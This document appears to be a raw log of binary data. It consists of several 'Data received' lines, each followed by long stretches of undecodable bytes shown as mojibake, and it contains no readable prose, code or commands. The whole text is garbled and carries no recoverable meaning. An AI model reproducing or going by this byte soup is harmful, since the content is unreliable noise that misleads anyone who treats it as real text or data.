ן'›\ƒcný4m•žÇð§Bfi'Û¨ðzSŸY„¢Êêúe›e‘ÂÊ6ßÄàø=Õíjçâ/0x/ùóà׸üº„Êˑ#^,t;4$Y**%O•(¸ÿÁ0©“Ì.=ѼcÍJ"'›~-…G Ô $!-°i$\')­àaÚ[ëZጛ;ÍɽâA( ~¤iŒbzB€µ¤c¶àŸP=å5ZsnþvÑaÖÇ¿ïÓÔu-¡¨ÞÄÐî#ŒªF.xþÞqˆÔ‹éÝÔ"mü¯ê«JS›ˆ~û¯“?+CËÓ씩½È‡äïֆž<g¢ +©Ã üæèˆ iM>Œ¿P 1Vs‰Ìï; +2쁚($­JjF[¶&¿TÞN7ˆçÌ-û²´@™€‡Ávûâ#ÀBŽ”,MHû<â!f(Öd³ÿ 0p´0§$såˆû¤ Š£Ž©4Eœ¼4.£‚ÆŽ†®¢ƒóÉD÷>â…ñ ¢=‚|ö Áü²ìþ³ƒÇ!ÑˎžµÚÄ?[ªé¡/äЏÕB€_'¯4Õj‚‡´(ژw¡G“øÓÙŠ£&ì×Ԃ§a‚Jcà×Û¢v—Ù`†ÿMcðß½®¯M eýgáÎrÜܪú ¿Á‹Kñ=÷–ʈ­iýjY—…—çÜÁ.μ ˆX˜ÜG3ٜh¡³1~ÆuMçŸ:…þXO8B\Ow®³eNä4à,ìh¤0D„VZ¡¶ÿ"èQ òø–&Wh„‘³Ñ¤Ê»ö5 r±µÝ¾Î(4CÂñôI’eD7#¿ñV•íE2j4œþÚ½¥ê²AÔïõYuWâZ Eß»k1¡éë~Œ0#™Ú¸®IYI‚!æ0‡©f¸wµë€~´Rc O¤BP¯[";-V[8°!'ÎÎ3M­ÈÈYQïí"9l—/IàÿÛût·Ì§4ØÇ~‹WŽÏ>xb}ºµ´öʵ>ÕËëšÖ:\Tð¿ôè
Data received ÚôÒÿ"{åýP*58X;Ö‚=y U„]rZ‰"ÿ<XÙkáC@¡ÖO4,ö73Cö¸è‰ Dƒu2&(Ùæ€ÉÖÑ_|ѬÑt|Ð -C¨v è*põºR¹z{ŸR½\'+¯G%å¸>½3$Úp…H •âcÎÂ!,Lä`š]Þ¯£Z‹g=rôºý®R±F£Þ;³Fd¬ i®Kˬ:]gŽpèÃ>¤ýˆW׆¯½Lž_ÅþKX“ÎâðèKÓ%½S—IMB¿…?`iëN¢·ÏdGqL™VOñdtZRSby|l˜:*ù<ÒìJ«ehÉuòãaLÕ¥X‘݉t?L6ÜÉF¶×Þpl–z'cŸ>UƒJ6ò÷ zQjXu:u÷ˆ.<2tEŒ£qyÜ<MìQÐô×Ýy-ëƒou²kXÑ ±ÁÜFÖ+Ñ~B]I"ÑsÍX'ff·YƧdÏݗ?Ü»´¤‹ËÚóñ¤–«÷õ\Ò@š˜ ßlxr”ōôÉ°¤ å}UP÷‚zœžo(P|²0ˆoüS°˳Éò‘J­F=³+z‚uaK6:ºûöþ…ÝÄvVj_k<ÍJM³ác‘ŠL/[tì3 ¶þç¸²'m|,p¸ÊXKg^‹s.´+åÀò—Ü؏ðÓñÓá6I£˜˜/4Œɏão«ûRsԈ Åšs=ÒÞq¥J.( g¸ì©´Y n³4ñӑ/&kq7`ÐWno#Xÿ*gœ¸£¥_Ž)Åó_œØWH˞sðãõ æє³úŸ!…Íã÷^¦ìS/ˆ†Õˆí|Åp£Xç¾ø«¡X¨ÚRXÁЛgƑ§Ÿ#I`؉ûB' ˓9á_,¬{h{¢èjÙ‚+C7GÄkàðÑ«ê¡äËI( ¶I±<çˆÏáÅ 07øh}5+¡ÑØ1ºFaî¿ü¤ÅÆ»¦þ‰)†<1)‹±œûñÚW·ï0‚kJx­ë6z‰E">Ä>Ïà×Hý}›bÔÝÔ¢±ØJöÇK™œö7¥z7~ܖâ'úíHG4AK7eß6©™Ÿ/k–*„´tC¹ˆa{KYNø µPMˆÈÉ%৯Cþ?ãíeûzJ½îãÕõŞN2HÌ  lCnŠàËM(‰*þê«t鐑ךßÙì]ÿ Qs¼÷Gòñ´ «MƳ`ªl†iK)1h¨ýbÐx|,™^þÅ2+°•/u°™?Ñå­!{·­£<Œ †£t6=å}1eàœ<æ69Ë0^<¿ÃyåVc?Øا.÷"lSᅤ,ۏfìÌTg¾²#Õ `žqhðTŠ pøCw-‚<Ò¬íꄞâ1ïžeð`ùW>¹ý˒¸eaŠ^ªÅÀ4‰;¢=.”¹1ôkšûC1_Zq —ÕvŠTU5¾n›9Úv÷õy³êh•¯©%M\Lœ>ۃÕöh5´œ¸IS]çôèÃ×°Z¨Ìªlä>¸ dïyªÐú'd;o£;͍O‡«ÌşcVÖ¸íZÙp…Õ·a°-d1ÓÊg ¢å²¢QEt^¤ÙHKnŽB¤pcÀ-hBß@IKk¯SY­ÐúÍ)!wڔkÆÇ¿ÜnÜ­Ø8Î i Òj¥´ ,›YMÔm›bÝN¦%çù_å=‚@]߯d{<'íÙ øèô’wÇ´ÉŌU»¼QSVþ;Ž0ëÀ*Ú_%œ•’scí.Éàðÿ§7ì1הRRà¡WüöÁ®~
Data received 9— áê/ŠÍ41\ÓdŸ¤Êt±o‹•aw,<–Lt%ÓÊ©BË'Œú<ÁÝ¥ »”Ü­‚í¾XO£åKHÇÓ¿Íãq7UÄš]*`„•SHá~ 9ù¿²¥žm²í†ÐrÆ7òa‘GMΔ$؂Bí¶:vjfÊwEÛÅLX-À< :é}ÖÅ9Ggw”Fª¿mE‰$ÍUF†Òge‹0Þt$©q4*-a}_~ õ((g¶X í®{ŽÙs÷˜‘òc=õÛF¦wb»4ÇÖvýŸ\.ç YÈiµ&Œxݵÿ&lɈ:†Ý_ÍÛhDL”¥º)ð0bY¡ën |MÑK5Ãîæ ÖŁT*7åù*YZ-üDAQíÞ Ø¼:];4LHHFf¼pʔ=c8gO >dkgRZV²TyqÖ8™ ª ƒª×î™Ñ–“­ãª‹àj9u<reW¾ÁÅÕÐ^éžû'j“LŠ¸Šù66ÿÂËæZ»ˆSþ:áU¼Ä3Î/§w7é| 8g£7³w Ê'S¢ú¦Þ ŠÅ&: 8®Bcw¯b3/d°íÁ“÷ŽTg­G·ɲÎ Ќò~P_¡*¡´Ò¸Ò?Tⶢö¶@\‹ÅpýÍZÿÌLâôjULÀ:Wª‰>[)˜zëZ­ ÅüfY`üè ZôhJ}r'ÈNÔÝjE¿rô©Ò">·§ákýˆè ÊFø<‰2†$óK#–² áBYžë«b{ãz‚V¤$Ygíbe7:Ç'ÕDÎÅ \Q@dPֈÞõ‹pì+EzwçcK¦ÍìR’úd~”D¿@ÎŦöcM“O\úÏ°ªðihaúœ^c—ëß'#`cÚ¨ÕçÇød3zšB „`ÉÓoâd4–9µ"êŸæ­HÄ%WÒ`¢êĖpÿ¬¾ˆ/ap²º˜Swó=;](]zFHå=auîC ôä(ô;×Q¦³³煮x¯…w•‘+gõÖîZL1‹ô7ñr²H“ÚCb·œ™Ëƒo¤.õ!¡S‰ÄûC~Ç;þ°ÄÃE²þu¼0¹5`e”apZÛéf¦ÜF_¿·‚¾Üÿ¯ÆD‹«ÏÆ?¥Z"Ì›ÛT$˜çá-aø%¨¯Šm>¼8è¾ÁBr¹Æ,µñ–; ìD[ºöÌ ¨>ìëΞãbÜHîQ÷h‡I6&qœ¤¥K3ž/ö /À 몘bD §IÚ¨Zwá£ÍµYá¬u6YÓµ(d´òE©‚ÿL¤bø‡0ÁWóNíÍZœé´<ÔÏõ›Yãõº¢K±V4ΨýxʁDþtù±5Ð_Èâ0Þà/HnÞU7qK~/1Í%‚3æ:=Õ¼3ˆù“³Ï÷(v´‹j%í%?!6ÖÃN}ÍzŒ.z&ÜÔ»æú¥Z®Ìá }ïÅ.Èf$A賓‚ ³„`·úÜ^1㆞^£ű:e ‡BŒ*½ÿ“ßžœ ᚒ,\$0KçÀøô”}´åù•i;{؈8Žn5OÓä4,|áO b Ã¼DÖ>»b­•Ù(—‹6lµß¦y†MN¬ ÚK±½£Ì—=ÎÜ]®wD»DTh½(yï>b¼Ó÷Ô«"BÌ/Ÿe@R³!r‘Œ½êP¬PkóèÒþ;ÊWŠ²Ô³Ý6 P¥¼ñÖÞd˶s9“³?úØ¡^ÀʶP†ð±‘Ù{å®â€l¡ÚlCcÎÙg­¦@Fw"–c¿¼lôÎuO+À[#q‘ ¡æÈ*GÀœ8Мõ³Y1ÈhÍnËË
Data received Aó¸uW~•{ÞÜ°K¥cœŸ”YËSP^¯–ïºaMÎ{K~”.$‘Ƴßp«3BõžŸ4ÓNA$18·)Ë,nDeV ps®$ÓwP¤Rßã=Ä9Æ$-àÀ ƒ˜XLç+«É.jùϓz¾&m*†''6æy“À‚‘=oè¿OYTxjI]¶Ïhšü?iÜCþŽÂò"Ðsþ-X(­qÒØ£ §·S1¢³ùÉc¼ßHÝØ©x?K¥ Ò¬©c”'‡©d®Ò-}Uݹ«D– vyܚM亿õ…C &°+ í†wCˆ •êº9ÑÖQ†'@Äcޗ¢f×íàk­.döÛB°Kˆ6#M&ÍÊ;Sm¶ ¢¼lPÉÔt×}:Õá÷im î´ÆÃbx§rTEQWböºø¦=7½%¿ð\oï äè(ÂR]ÁìQÃ$L.¯¡°)à4O}XXD.D™Ö&Þt¨lcü&6Óñâg˜Ü@Œ9_\ENÉú¦ÍÇZCJEzÜ|0ˆç#Lÿ¦)öwÓ#»èùÈ,ß~‹Ò (BG×A–z»i†6«F%0ûZ±YÊãûӚ^U:vœw£ÀÕ×kˆø„céu®Ù`<GÉo½Æ|&1ü 4~ÍEv¨6ºñ<§H@™œ,‚T^@—Á:ÝÛÒ~ê3È7~FNjÁcÛäî=gÒÄk^X  ÿî棊änÒPWZÎÊêeO=IÈãÆ·•”[AͨoU“e£ížÿc)So~UË_Ê nu´˜°èH¸›ªÀ|³&`ú*®õD–‹ˆf<ï•Y®IFz‘jãaáºOïVÌõ?Lù§žÜ] œ\ nÎRö *ıÀ#^p ¹ìš»iYmqi'ØDÝüµáè*²á‘“Õ«G½xVÀ®W3ãïäÞêœÕf—àHj\)‡N6D,çϟvdš„?àê‰8ð"i«¢äjˆ­;•ìÌ¡<D/÷Ú ûþ±Yrö¨èäLÉÃÙ­+aWowk×îfž.!0WS'z–x¾°jE¥Û¿ó[ê\Ó!Þ?ž—üÂuÈVÓ-Œn¦˜kC˜^NÛd†-¾/±µ­cvÃ'r‘ʯshY´l€{‘|g•{N=k)}ÐqPXòŠK¶Ü:=ð4]€UçÖHÌ@žËœ‡ÑnŠ©Ñ< oC· OvʃÏ(1ˆaõé×Ö¤i„.f“üoŠzÜO\Ó¾X%¸Ó,ÉD=ÎAŽ—–ùIºX ü`‘»+›6ÿMnâ%[ƒkÖíY£¿<;ú,«g­€Àˆ™“â©J ÁY)LQÈ» 8(ÍÆ'Ä_fßü ~¤ É&:älk#ÌT~_«»Iº‹¼,‰Ä7ç‰õéªÒ¢†¾˜ÇL ´T>VHØt‘“l"ÛÖée£ì÷¯dy-=pa#?D–¦¤òR‹BeRގå=6€~¡ÿw ©i<ÓéÊ^Ãâ à‰Â‡C!oà>¶å(GîC!6ÑJ—¤Œ>G€±Þ8æyG}ÒX¾åÈeyhšFÄÒiƑJ&û'$K](¿zV’á=ˆ¼çS¾xî" |dzݳ,uIa{ F·zôÖÏÆ°iǁã ¿|Êy (‚²Ú¥l®'¼¼‰CÞ:¥ˆ›54&WxS=£C^„bˆRó,ä €Ú{»äÒã™Æ¿Qå÷/oÐóDÖxmí,{á›ÒoîåЖƒ`Ç9ßÂu•Æqz<36Û±€¬}—&ÃÆ «ßï§;$_×
Data received 0
Data received )û'd=3ÙAö.g=ãTÀ gÆÚà½uÞ ¼¸Îw9¤¼è}«º®ì!ôuºêp °¦9Â;‘IO;` ßÿR㡌P 'q€óª»£“ƒï6ÆÑ´Òwœ:F,¡’c´U2~fõ}›Ø9ÝOJòóÊg®h@¿_!Žé¢wËd5úÚ <—©i–‰IÏðHÞ  µƒ5Þ>·‰>­dm¾±Q÷–BzÌÅß³é- _3zÙÌW=XþÀ ¸h?܇áŠ=g֕ì|ÊXÅ9V¡áFۑX²WãÞ`%€¯!òhÊýµ4I },N]µ°ž?¹£™¶îc4£1~´zhz] ;q›¹#úõ–“Ø獘807TÚ'^Ï=©ô%›&]
Data received ’ ¥Ïè.í¡æ·•Æƒ©\ç„©{Ñq5uñ´2HÄ-¦ŠåþÁ#x9+¬f6ú#øKâ†ùLTn}OjH«ËúN“çˆ­Ú 77ضZ6UêwÚ8®ÜsÌ,^± 14'e…¹v¸wƒíólÁÊw¥ô#»/ÃMõî¦Í¯ °Šq䵝÷eü­ *+†¢ñ!›„Ó:þ5xäM£ŒÉכćKiK›i"]ÈøøIôSþïJÕt%ÓûîE !燫„k&m™„ÆŠú¼°ÅŒYEtmÄád1ƒ[ž0ÎøpP€Âh_¯r˜›ý²Îåâ_FP¿HGÕ%'~Ë¢ù"@}ߞÞ/‡s–¨ƒ¢œT•W±ž{).‰ü,+¤Úo÷1­w‹`ÿ”•ËŒ]Š5}ùÊ0áá$/Ԇ˜!j¥a Ċâ±ð칗BD‚ÛAí?±5—8·})³Ag û‚ü , þNå×=Ö!“VÄä÷›’К…å£üýþþæa~ )…pÖi§ŸàE%,Ñ?ŽõÕérùy“U‘OòÆwþåbüŒ¸bœÄ` ³Þ:>ïŒÏú¦é¿]“&(€9“Y­%{ñ»sUýØn`-õJa°o}4ªqB¿ò¤v†ŠHõ Þ?ݒ[½‘H–~ ’’ŒùèMôs~ ¦&53hØ“€ àŒÝíPX¸ëRÞG¨ÊìtȜ fyô°“5>+PçI(£ÞÛÙÚªt ÀNbºX _Ð ¤ðÑÞïm¦ì¸ØgpæÿÇBB…"óyô ¬Uè7œÙ’©“{ÀÞ}aóFôg¼3îþ Ð tØöëzì‹™X>˜ÜêëçÝ3suÃ%WÄßߕTem¢<rU/œ få+(W\þ—p+Kå}ÈÑða9+½î°p£×©)‡,¯´»-r¡Ý~õìqs|ò|‚û÷…Ob¦ƒQºš0I¤ŒJˆQJ˜¨•ˆ¿ •‹–1Utó÷§„Ë ek…A54ªA.›¯ló‚ל|eØk ×Qƒš ä媫pþÃR²èfփ~ÅϟÂ¥>Üþþø$bU"éӍÃÇLžé0ÝÂ>ï×O|÷â‰Õi+dEó×OoÑÊ ­ÊCÇȈB弄>ßÖónâ¬õž¿­ØCÓ×ÿ¢€YÕQd&÷€|5©VõøãtžLjñ–Ï~è"½€tCc–WfýÌîU¯†ÿtàIm ŸÐh%/•lq1jÿÀe8ço;9¥yº nTk"“1€m^B}÷ m§öÊ3VtšS2„)b®jÃÏí³Ô›fXIYK5—åK¹+4¤Ÿ\3bÒý$$úTÞ¾ž3²º€NxK<À„Šž9ý([é ÕNèj‰Ýc´u'˜2æ…­cÙvƒK7B.AX-Җoßû‹1Þïã#ªR¿ÀM„ñƪèðñ0p'•§¬H61L,ç^â»Tê!¦[LÉ©#Àt‹æ‡/ó‚´F†{IðV$ñ$yX „ò.¯WLõÃ_õi$k=S©U¦:¡´mÌsõÆ Ü6ñ-Àö?`àv×H Å­û»Ñß¡ tÁÈ¬aŸ~nöýøøAó³Âc¾Vy\è›[ú8˜Ò[>´áj‹TÎÜr«×Mà©]üSñôÇÙ“ŽiUGñò†ÊöÓΊiÜçn¿W|Ú.âYctÙIÜõD¨GuÍ%¦n|~yÒ) gGŽt;:+'3¡êêqZëgUìŽå¼"Ã6¢yö“¨&gVu*- VC: 8Ž„à#Í>2'{셨
Data received P×{(H¿áíF%`G¯ è°ÁÈuh•ÑcoKèí¥g~+Á0¶Á ömà¡ûP‚tÀéž9ü8ŒPgG¤TCv\m =cžÄ'½«K‚5wÇ¢‘cÜ ŸÌƒ³hjÈ# )ªÚȍXç‚u™IÐ-CƵV@ÐIÿM¨üáåœ$ñ,;ӒP8—Ü–°^£‚£ñȳ—=뢅c ĹQ%‹ú20æ³”9Q¼Ø—ÔDÈ;LHCŒÐt6&b!"ˆÜ§`UèӌŠq›K¨›ë”ÀB BŽâîÑÌ©ùêŠRÉCtØ«çÀ ó”ÍÏê 0üÍa<‹ûáOìÚo³0ˆ“kÔ(܅g'bç9ý®sMò{¥ވZMŠ$šl¦·-K]ïõ^ŠªÖG}èI¿ÆÇ_h"MOwuŽÂS¥8Òç2e“#G…hä´s€ê‹&1͓È¥k:µœu×>Èí²ê&/GïK…BùR°óÙ×êÚ ^ó²zhŸ=·™:Ô3BZÑÜ݃ò¤L£ôX •S¹7= ¥’Àa—QÔÀ,Q/9ž/Ws;hc4(ºI+µ9¥°1¼:¿‚®`k)÷²çžaÈÜSlÿ¥H҄ѿuåÞì ¢³/©IEDïjLž¶€Þ;rW¥]ŒPB× Mè8?ìKÔy{MõtÄÏ}5Cõoë( ¶HµºÆR9Çld*²©<ˆlA<±®žtÊw™<ì€;T9üªʝŸ0S¨,’AÐü0¬Ž_«&j“ZZ”ÅÃcìí,V>OK n…4ÁBÁ…ºFÚ§ªÝ–L±ø_z Ü®¾ûÖ*!¦…b2±«… 7Í5îá¶]{îQsUx44««DY`Œn7qÈëéŽøµÑ7.½Ôà4¢A,ÎÛåä,ðÔ ‡»X FwŽó–°¶bå[xŠMZ±oºúKn¡ hªv_B녞ô½Ð°ÍuGݜ̆‡·"°JÝÇvÄυÅ"ZQ×lU¼DÉÆ á®Ó*ôßϦÜьœ`½È; |©ž¯ډÂÒoÜúÇ*c}ÿbïæÏ ¯~ð9)ŽôýÕx}·}·Ä$Ràj ­1ùDü‘Ó‚ K_ç4‡Ï"ÜöAN08{¹l öµ›…‰cUÌuÎn‡{Ñ·í'Ìý„•Þz ÇÃÑc38®OÂß$øZçDVŽaVwS³‘nwL± ’ÙÚeY†ZK;֟'¯‹žJìWKbÂÝýÐl qþf´þ{6ÿüÍÑ>pÔó©ÄB™vç$¿Â ]€i>OÖ³Cð{CÄß4¼Jö1üîVH*AƘ@Fü4Ċçõ^Ç]ucÖäíbôÝ{»MõY›8ü~ö¹|dl³#˜<±“º"›~S²Æ»¾º†Á2½jÓåó:^£ñV^/‘ÚÕ9ܕÜÌ^1Œä ÍÝÂ1ÂøŽòÍìN…¯Tìݹ{G1ߙ´b­t)< .¸[Šz&©£ª9aªÛpT¢Ãê_B–ÅüoE|c|Üòóè¹.;ö;ʅ”ãl&pa¥[tÙï[O¿–‰ŠOJ‰‹ 6ONëЄÍN†Ö׊wÒ¢@ä0&6°Àcݓ’©Hztbq;J­ˆR;Ýd]Çm5ÏmG)5Ç]ÈÖîçeÂ?RMî²'{c:©Ñ§CåΔ݈Vt:tn±®až‘öIâv¯ÇÂ)E&`±Á8×Ú%ãö´Ëp¸‡’öÈ_üÌ ‚SMÑC*kkòir„PI¸ÄÉ^»Ã
Data received »Ï‹It­6ÿ÷Ž›ÕÖ0ôUÑR‡~\70ýÑe«ªó‹õܵ‚á,Õ[ی3E+”hjäV80¬Ì3Ò¬ÂvôÏdŸf ͜TáM$þfíråä….´£™ž—ú¬¸O®º™©€Þ„|öcqg Æg'®jz‡g¨âz˜6Ý4ô{Áõi9ES=X”ß·K?dEŽ«‹< k¬:”Øï¶s]þËó=\ö¢‘Øpõêé öb½´ È %ñê‡Ïù_U>d ,]ƒ@9 ”Lo>?øÑ ž%É!Õ{ÌYcÂÞÈG—÷rÅä•«bbëXÄGÙ)y—Nî® XÙ5Äë“©Mæö!à®·–Ú@õ½ò|š•Žh-‰¦Ã¥ì–lÚöÙ˅.KÛÖt,´™óSû$¾›èeÑڗIf]#þ'ô©‘¹÷¤Dã‚èx\Ì̃Sá¦é±ýyʽ–Swב°…™ü9RKoE ôS5eª’ŒÀ\ûuT‘&0˜A=D¥e3n”ïséG˜âÍüh•×‰tò#[ç·—Ó‰ãmÈă¹ÉJÿƒßž–œÏg ¼ÄŽFóR[”=G"œ<¸Ìü bOdšƒ/Ê¿öžlÊ©EEŠ;ücÊQÿøJÚcÈ,". äEX±Yp2W½Ö,ïšZK™Ú¥¾“ˆÍG±¯M?Ç÷¤؀#³Û¸ÐVñA\ÑÁÞ-C?&“ GËô‚fã)bÿ¥S?·ââc‹^+$[4¼á%ýø·äÓd¢*Š–*7¾‘|PâH¯Þ‚É4<kQ؈PˆÃúÃ>IØÜÈI‘øeÃi`íOLÊÛ«IR(ƒrºû*YdfÕaë>E¦Nø ÝV~ º'/üÇ=ºe@ض­Ej;ù5”*;2w+âGI#eÙo›° G}wx;ú3öÄL¾†Ña²Ëì +'Ñ>qT?ÿ°ÀÛPO¿\×}ØÑoÿzäüzoJ¥A¹‹ßޔ«ZüQþm®Öõg²wq‡M.DJæ,´„ã•…H®´'K Cv˜±Íùü§:ÉË9Ø'iÕ,zE…£(á&Ó¨ø¡B¹5È ÍÑ'¬›j`ö½/’ÈþêÈ|ëVU¹e1ÃÎìB´ìªš,iþ¶%§dù¸ìîÉàššÜ,y¡Ró*mâFÞ£W‹lÔzqöRµNhŽ^-YuN¼Ã–‡ŠÐ®q¼üÚ»„­‰¾’mÿ§ì+ãQ‘nˆÄ}Am³Œ+U·rÁTeÛþŒ91™W:˜< æ *1 ùÊÌ×hÖ\ [76ö˜v0c8fMÇêr¡Þ7ƒ¥$$˜)a{²©­µ]{]ù~£9‡B¶?ÕüÈqäA`8ÂMÊȍO€Ys$ýHÙî¥7Èà÷¢`bo߁NxÚà‰¸ ¬¢4¢V·4»H )S+¸ÞÀid„³êo’»’MÉôÈV«;§¡{„Zw²²Áyœ«ßÞ9[°ª–v1yÿ’§»!µ…I#Wêtj3eú½ÛsÁøFF hO B€ìЪ{J32?ªçeë,TÛ4ihn_ëDHÑÆ?pÔ}·4¢0ššú{A¡R°Þ÷ì91‘f6 î·»?ÉDù×\àÿ­ ¦ÈÍ9-^?›#¡¼P6WT!EÎý(©h -m¹×5‰|ÓªwìmàÖa!úëÞYµ‹@‚q ¦;:/¸?(,€ƒí½Î¨€åã<«…š7¨tÓşÑþö¤ÿè"¡¶Á¤ßÍ®±#WØ}ïŠ-ˆûþÇ~®qí‹
Data received –Ô#ÊuÄJ ‚ïPœƒ—YA£î“žX5[͈þGú͛÷Û\¶‚s>­Šì‘¡ƒêùr¾DÛçV@|5G’þUૄB&ü<Žÿ¿ŒCù¶}OºñN¤ïw<ÂÁ‰/-Ï+Kʱ¢U&êú_-"rèl¯§Žˆ;Fß:³_°kIíÙLoÒõv3µì҂ä^Ê>Á§ÿ £\AÖm ö÷yðzj¿b¦õɝ3±¡“ÕR À¯œÛW˼qÑ°’#ѬUpùãÇÖI#&ë‘RÎMšEÎ[½÷4Wœáëµ³HÝêŠ2Þ ƒ+«9Û¬¹Õ¿ïÍjø2° ÿcŸÞe]¯XÏâÆÎ×|PZÐÀà m/·‘ÀÖåhÔGaãdv™ú0Mò'{ÏB05{a§*ø 0’ZDúzŠ8¯Æ`ߺ cNǜ‚t~ÉX(Ÿ#µ}–#9¿"­/~;ÕPKXP&5;ž -nÀr—níi“ IÓ+k‡ÐDï){YföB¥SŽ_ksáIí>öÖ¥o?Ϋñì•ù˜øâ–-™cë8(¦ûó§f/jÊҋÖN~×Nƒf!0 J´sœŠ€7Ÿ¯cyç{’Çý °ˆ‘Ñ ”ø¢iôÓL@àZäðÃ|É·îg)¿ë>pƒÊ ]¹–/Äá%ÜIýÀ¯á%þÙ6ðmoÌ"—Íü{ ˆâæ|fsŒe!ñçæ×Ëû3 Š".q ¡éØ雎Bˆ¶«ƒ4´¹M›Þl¡¯Ó¶ßdÅX¨7ý`ûˆ¢¦r1"f¨X܋u£Ž)ÏK²ôé5 ± ôÒ¬”>±m½í%B^ó<°VrÆÞ®a%°V¼úLUß0DŐLqGcü µÃæíðÞ@Ó1¤»ˆ¸ÖoíáAìíC¶Ûò~–’=ú̆årµ&”ýÙ¡”|~ž`ö½'ÒñyöIùHê5˜«ÐOƒÔ×ãm•’Fø¼Å×Òuu“æäxJ*™hKûd[¿ÉIaœ}Ü?—Aã\8¬˜¿¢¼âK›µÜ »xó]½òU‰âE­sòÆ>#[lÅõKWò\cÖԤÎÄGRY"{g«vö¯ƒ/Xù8 ~“^)o0—¦¾1ÊÖØäD˦÷Q6C4v‚6@ò°T9—Eÿ2HŒ°áãìʟ™ì”`Ø:AS[*?-Dӎí¨*2ù¤©14³Íeõ¹[ˆÓ ;MðлñoK~C©­èÝé IK¢z¼yA?¥NæЈápQïJNfî„PÏ`;†6ÜAÅõ+‰þ,ÜÙÍ¥F•.Àá~×wóÉ¥û¬Ž6Šuà€°ß³ÜgØÇD!SÃÁ¨í!e?ú|ü/€ŠŽ72ø³#!¾œ­MZ¢¨Qå`íGã·ÖyFø+–Ÿ”äæÚ ób¢5÷Šs=™ììïDí¢g‰%€ï½Õ†oA¥“+u%ÚIå´Rr`}?å "Îå6¨ àb֢؈M¯ ÷ÔqÜlJžWñë'åæŽ6ëG¦¸Píy¾­©8^HÜ<•3Z°#iæXUڊáòz¤b <Ù¥¡=ëß%Ãö$ïï¼ •g55òŒÉ7r®‰ðeΡ9º8z®?­à>5¶5éjm$œÀq¿A{ IOK¢Tˆ†ë§‚O19_i;2è\/3ïö݉±N¢Y,Ή=KÀ6-êG¼·|અ'ìˌE~a=Öj Û_(/1|a=Ѓüˆ—¡HûÛia  +ÞòÊ£ó4¹SW[Gì 'q&ª
Data received $³œA‚X3v)<WÞV\€•}ipmÙò }d11ŸŠV&?Ä­äӌ«<Ru äiC\‡"O¹8C֍šƒƒ‘ââ(5þ¾ÎGüÓj”¼AâÓkGÞççҙ AߍÌ´òçVjl¦ð A C»+Jéöÿ}?àÑ#^·ô-š`ĉx0<×Ò38¬Ž€»ž-"B¥Î¼ŸÏm?Ýöu´é»e¯ŸñË ?Af6¢¹ fTÜ°ýa‚C{5•zE/|c£\f“ÇAĐU-¥î?¶jwÑäåÒыÿ&•t0Öñ ï0j3;1 ¢Î;ÂNgÆù6À˝Ke^aÂa°Bñ´Ÿ½vxÈ«t¯yŒAÞsÀæ}¯ÆtÈí-á‘æjÌ4O뀑(ªvȶgÿ$º’ÿ¼`@ :ÐñH¶£Çž¿É‰#Žx.Íx‚ûQÙÙC!Ì*•ZCç[WBÏxl×6šTž,qCNԂïklÆ E³üaÃudÆüUJ®ìNþú2ÅÆÌÚAÙ~õmÐ'ÁG[kM–Üœ¡ûäH¶{W®új þ“y4ªÎ$è?Õ\Ž»œà”UÒÛ5š{%o*°OhKؑÊ~,ö%.¢1õkÇ@23 » ôêùk MŸLRÏ#Ì:²A)î…þ7`ägÐÉäyh˜ÿ“’¾±dýþŸs’h^d.ÉaAüÖÓð3Y†WýgƵ3'Ûr9†k oZ#…*óã(i©`±x2p…ñ?Àk‹ûs“Þr™,§Q?( gýlÝŒrâV¿EøFzü#uÛ½þ½œ¾’0–È_Ã%þºßéiDBÂrܛŸË »áy ;¶µ^~6\Þh²ÙéÎ¥oUs9éfBS(E¬áŽSNìaÁÇhVVã,RÃHàå "æ‰%å<?O Ðւsµ)[³‚X̔vØQÀt´!e‰2Ë4LŽ¦h, %•eÔRï4tö‡ EvöÂK87Òœ?þH^}7<6ºMÖBb7ò±Õ÷Ù$œóÍD¬ÂKºrÜ?xýYÔÑ ï±úÖ¸ÞÕ#É g1þ-¬«¡aA–^"%:_¥y1ZÎòüTÑõÿ³!6i½‘rž%ÅßHSýy†eÄÆ8oy•føæIâñ6"¾p€Ãæ87ƒÿÞr6;và§o5żô‚/£]1?‹ò5²ˆûÏÎâ<Q¸Oˆ­KIï`æ–HÍäOÄ—(ëlųbÈj]R,9Å°´ªÄ"ƒf9è£ãċ†d ep¿ÁvÛÊ^NÉÀ{2é÷ ga‡¦Þ:™‹kŠù; Ô´˜go¿ÀPHÊJþÊÄ=7è`Š‚;42b­uš¡$ZúàHÜ Ãrš‹Ù¦Õ¨jEURËÄL'³%zj¼£p ß꾪{Švu\Ô²L¥w;*ÿҍlé@ÊÕA¦ÒûýO.œ,y5ÛÅDtÝt4Yº°¼ tK(Gc'˼ÉHºcUš[Õ ªÜüZÿv”ßè¶hDQ‚ø-T9#£ëI¼ +Ü.¿ŒuŸ¹¸‘{<e˜$N25¹3†Î‡OÀËJ— ùµX˜/¹‚; nÇ®—.Èh5ò•Ê‡âñÒhÒÛÖñŸ±›’\ ÿ!›* ýSI)DIníî¢Eîúr,ýeâþüàóÞöŚVÙ?%"9™ñÒí­ªf\‘дQÇröLé/Сeö¸¸×ùÉV¶ÝÆ(_ç™U5=•5VÍZuv(•g¹ÏÞÁ³[W×~*ôC$Hee{ff_rN 9·°o“4¯êš—¬Þ7øÖJ2 
Data received iٗdsƒdTºßrjű¼›¨–È"%ÝÅNئ(ro5ìèohò÷éÒ¬äêdÊaeéë^îXê¶ ò³ºP»ÈG²•ÜæÒ`ý:Ê7ß †Ÿ/[MD–xÏRû0¥?>Oþœø-Ú|¯Žþ‘\Ejã€(¿þÞSÀ]$æ~àƒ O;Kź»½˜÷lp©3Å ü¿&P2êµêӝ%Êh9̲†Í›<1Öɞca|v¶ôª›§H;BÚmÍÇÓôV5 }g¥ÇÑ6 TTh4I1[Í´Žè⡖`A¿ÅÐ{Ž'5C%2 ’Ú5µG¨ÅiÉëþ+[Ò}ž.‰|ˆë«\qôÝʸÄcp5SGr9úP9L˜¾ç‹SùLD“¯j— ªyõÁùˆë¸R¹ÉÚþ+G~Ìó‰E›â-…|X“]ŠiÆL%R¹GÙã Ì}ɏŸ9)eTŠ7(JÛb©Î•z‰’ã­ˆóà?ßGmËdýÏ>(ýÌ v{i¼|žúÏ!9™Åòز ^A‡"œÀ¢ùY \oàì’Ms¼Cj/´(ì¦o²”Ù ´Œ.K'rEæ½€¥ûÁ;l#õâ)ãÑ5Äp™¿¢#X ü­µ U‰‘ÊJ 